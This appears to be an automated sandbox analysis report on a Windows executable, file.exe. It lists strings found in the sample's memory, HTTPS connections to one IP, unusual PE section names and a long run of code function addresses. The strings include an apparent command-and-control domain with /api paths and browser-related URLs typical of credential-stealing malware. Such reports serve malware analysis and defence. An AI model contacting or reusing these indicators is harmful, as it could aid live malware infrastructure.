Source: file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2272354307.00000000016D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/
Source: file.exe, 00000000.00000003.2171451535.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/&&
Source: file.exe, 00000000.00000003.2174167356.00000000016F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api
Source: file.exe, 00000000.00000003.2111788836.00000000016DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apie
Source: file.exe, 00000000.00000003.2212526320.0000000001701000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2280541673.0000000001705000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2272282633.0000000001701000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apii
Source: file.exe, 00000000.00000003.2272325974.00000000016DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/p
Source: file.exe, 00000000.00000003.2279008440.000000000165E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2280254483.000000000165E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/api
Source: file.exe, 00000000.00000002.2280254483.000000000165E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/apiicrosoft
Source: file.exe, 00000000.00000003.2136702572.000000000170B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000003.2136702572.000000000170B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2136702572.000000000170B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2136702572.000000000170B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2136702572.000000000170B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.2136351465.0000000006013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2136351465.0000000006013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2174609302.0000000001701000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174185636.00000000016FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174670298.0000000001704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174142658.00000000016EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2171451535.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174167356.00000000016F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f10
Source: file.exe, 00000000.00000003.2136702572.000000000170B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2089675669.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089743305.0000000005F26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2136351465.0000000006013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000003.2136351465.0000000006013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2136351465.0000000006013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.2136351465.0000000006013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2136351465.0000000006013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2136351465.0000000006013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49712 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE6170	0_2_00EE6170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ECE2A9	0_2_00ECE2A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EEC6D7	0_2_00EEC6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFE690	0_2_00EFE690
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC87F0	0_2_00EC87F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ECA960	0_2_00ECA960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED6B7E	0_2_00ED6B7E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EF6C40	0_2_00EF6C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED0FD6	0_2_00ED0FD6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EF6F90	0_2_00EF6F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE33A0	0_2_00EE33A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE15F0	0_2_00EE15F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC97B0	0_2_00EC97B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EF9B90	0_2_00EF9B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFDCF0	0_2_00EFDCF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EEBFDA	0_2_00EEBFDA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EEBFD3	0_2_00EEBFD3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F640FC	0_2_00F640FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F840EF	0_2_00F840EF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0103A121	0_2_0103A121
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01046127	0_2_01046127
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA20D1	0_2_00FA20D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101C12F	0_2_0101C12F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F260C1	0_2_00F260C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EF80D9	0_2_00EF80D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100813D	0_2_0100813D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDC0BD	0_2_00FDC0BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD40B4	0_2_00FD40B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA40A9	0_2_00FA40A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01000158	0_2_01000158
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE80B0	0_2_00EE80B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE40A1	0_2_00FE40A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7609F	0_2_00F7609F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB8091	0_2_00FB8091
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FCC08D	0_2_00FCC08D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ECE06A	0_2_00ECE06A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDE074	0_2_00FDE074
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE5F7D	0_2_00EE5F7D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8A068	0_2_00F8A068
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAA069	0_2_00FAA069
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01004197	0_2_01004197
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102C1B9	0_2_0102C1B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F2204D	0_2_00F2204D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010801C9	0_2_010801C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0105A1C6	0_2_0105A1C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8603D	0_2_00F8603D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101E1C4	0_2_0101E1C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F2C03E	0_2_00F2C03E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7C03B	0_2_00F7C03B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3403E	0_2_00F3403E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4E021	0_2_00F4E021
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3802E	0_2_00F3802E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFA030	0_2_00EFA030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010101DE	0_2_010101DE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8C01B	0_2_00F8C01B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F68013	0_2_00F68013
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9001C	0_2_00F9001C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9400E	0_2_00F9400E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9E000	0_2_00F9E000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD61F8	0_2_00FD61F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F2C1E5	0_2_00F2C1E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC81F0	0_2_00EC81F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101002E	0_2_0101002E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC81C5	0_2_00FC81C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0104C03D	0_2_0104C03D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EF01D0	0_2_00EF01D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F941BC	0_2_00F941BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE61AD	0_2_00FE61AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01020060	0_2_01020060
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01042071	0_2_01042071
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01052070	0_2_01052070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F5C146	0_2_00F5C146
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3E127	0_2_00F3E127
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010140E3	0_2_010140E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF0119	0_2_00FF0119
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EEA100	0_2_00EEA100
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9C101	0_2_00F9C101
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010240F9	0_2_010240F9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7410B	0_2_00F7410B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102A0FE	0_2_0102A0FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0103C308	0_2_0103C308
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA82EB	0_2_00FA82EB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA42E0	0_2_00FA42E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE02E0	0_2_00FE02E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0103A321	0_2_0103A321
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4C2DD	0_2_00F4C2DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0104C32F	0_2_0104C32F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFE2C0	0_2_00EFE2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01022330	0_2_01022330
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE82CD	0_2_00FE82CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE22C8	0_2_00FE22C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0104E33C	0_2_0104E33C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01014341	0_2_01014341
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01026340	0_2_01026340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDA2A2	0_2_00FDA2A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3829C	0_2_00F3829C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101637C	0_2_0101637C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F86268	0_2_00F86268
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC4270	0_2_00EC4270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE2270	0_2_00EE2270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010463B4	0_2_010463B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7A241	0_2_00F7A241
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9A24E	0_2_00F9A24E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFC243	0_2_00FFC243
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC4242	0_2_00FC4242
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010103C1	0_2_010103C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC0236	0_2_00FC0236
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB422B	0_2_00FB422B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F2E22E	0_2_00F2E22E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F46214	0_2_00F46214
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC6200	0_2_00EC6200
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010003F2	0_2_010003F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9E3F3	0_2_00F9E3F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0108E207	0_2_0108E207
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF23E2	0_2_00FF23E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EFA3F0	0_2_00EFA3F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F363D2	0_2_00F363D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102E221	0_2_0102E221
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDE3CC	0_2_00FDE3CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F443C6	0_2_00F443C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F583CC	0_2_00F583CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100223A	0_2_0100223A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F523B1	0_2_00F523B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F543B1	0_2_00F543B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0103E244	0_2_0103E244
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0105424A	0_2_0105424A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010AA25D	0_2_010AA25D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F683AF	0_2_00F683AF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01012264	0_2_01012264
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FBE392	0_2_00FBE392
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F2A382	0_2_00F2A382
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EDC360	0_2_00EDC360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4036E	0_2_00F4036E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0105C29F	0_2_0105C29F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010182A2	0_2_010182A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFA354	0_2_00FFA354
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD034D	0_2_00FD034D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF6345	0_2_00FF6345
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE44FF	0_2_00FE44FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F904F0	0_2_00F904F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F264FD	0_2_00F264FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD24E4	0_2_00FD24E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01044525	0_2_01044525
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F784D1	0_2_00F784D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F864D3	0_2_00F864D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F564C0	0_2_00F564C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0103E535	0_2_0103E535
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100C54C	0_2_0100C54C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F504BA	0_2_00F504BA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01038559	0_2_01038559
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6E491	0_2_00F6E491
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F88495	0_2_00F88495
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F38481	0_2_00F38481
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6447C	0_2_00F6447C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01036593	0_2_01036593
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8446B	0_2_00F8446B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101C5A1	0_2_0101C5A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0105A5A1	0_2_0105A5A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0104A5AE	0_2_0104A5AE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F32445	0_2_00F32445
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA4438	0_2_00FA4438
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4A438	0_2_00F4A438
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7643B	0_2_00F7643B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F42425	0_2_00F42425
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EF6430	0_2_00EF6430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA641E	0_2_00FA641E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F66411	0_2_00F66411
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F5E41F	0_2_00F5E41F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8A414	0_2_00F8A414
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7E402	0_2_00F7E402
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FDC401	0_2_00FDC401
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F225F4	0_2_00F225F4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB45EE	0_2_00FB45EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FAE5E0	0_2_00FAE5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8E5D7	0_2_00F8E5D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F305A6	0_2_00F305A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FA25A1	0_2_00FA25A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101A45F	0_2_0101A45F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FB0595	0_2_00FB0595
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FEC58F	0_2_00FEC58F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F62588	0_2_00F62588
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE8581	0_2_00FE8581
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FCE574	0_2_00FCE574
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FE256E	0_2_00FE256E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01006491	0_2_01006491
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FBC568	0_2_00FBC568
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC8564	0_2_00FC8564
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED6571	0_2_00ED6571
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC6560	0_2_00FC6560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010324B8	0_2_010324B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FD4520	0_2_00FD4520
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F70513	0_2_00F70513
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9651F	0_2_00F9651F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010484E9	0_2_010484E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE66E7	0_2_00EE66E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FFA6F1	0_2_00FFA6F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01010723	0_2_01010723
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F5E6D3	0_2_00F5E6D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01012734	0_2_01012734
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC26BF	0_2_00FC26BF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0104C768	0_2_0104C768
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EC6690	0_2_00EC6690
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EF6690	0_2_00EF6690
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4C671	0_2_00F4C671
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01050788	0_2_01050788
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7266E	0_2_00F7266E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED2670	0_2_00ED2670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F5A66A	0_2_00F5A66A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010587A0	0_2_010587A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F3C65B	0_2_00F3C65B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF0656	0_2_00FF0656
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FC464E	0_2_00FC464E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010047B3	0_2_010047B3
